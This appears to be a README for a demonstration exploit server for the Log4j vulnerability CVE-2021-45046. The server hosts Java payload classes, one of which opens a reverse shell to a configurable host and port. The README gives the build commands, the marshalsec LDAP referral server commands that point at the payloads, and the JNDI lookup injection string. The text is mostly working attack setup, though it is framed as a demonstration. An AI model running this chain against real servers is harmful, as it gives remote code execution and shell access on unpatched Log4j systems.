As part of a demonstration on how the log4j vulnerability CVE-2021-45046, a small web server was needed to provide various payloads/gadgets.
Even if the ExploitServer can server multiple exploit payloads, marshalsec can only support one per instance, as far as I have gathered. You can however run multiple instances of marshalsec.
Note that these were tested on MacOS and java8. The exploits need to be self-contained and can not depend on external classes outside what would be available on the attack target virtual machine.
Any configuration of the exploit is done during build. Properties can be changed in the properties section of the pom file.
Will open a web page using the MacOS 'open' command.
Property | Description | Default value |
---|---|---|
exploit.openwebpage.targeturl | Target webpage | https://www.google.com |
This was based on the code in https://github.com/kozmer/log4j-shell-poc. Some modifications were done, but the main functionality was taken from the Exploit.java file.
Property | Description | Default value |
---|---|---|
exploit.remoteshell.host | Address of reverse shell proxy | localhost |
exploit.remoteshell.port | Port of reverse shell proxy | 9001 |
The application is built using Apache Maven.
$> mvn clean install
$> mvn exec:exec
$> java -jar target/log4j-exploit-server-0.0.1-SNAPSHOT.jar
$> curl http://localhost:8000/OpenWebPage.class --output -
Assuming maven and java is installed you can execute the following commands:
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
Then you can choose which exploit to server on the ldap server:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage
or
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell
or even both
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#OpenWebPage 10000
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000/#RemoteShell 10001
${jndi:ldap://<marshalsec host>:<marshalsec port>/a}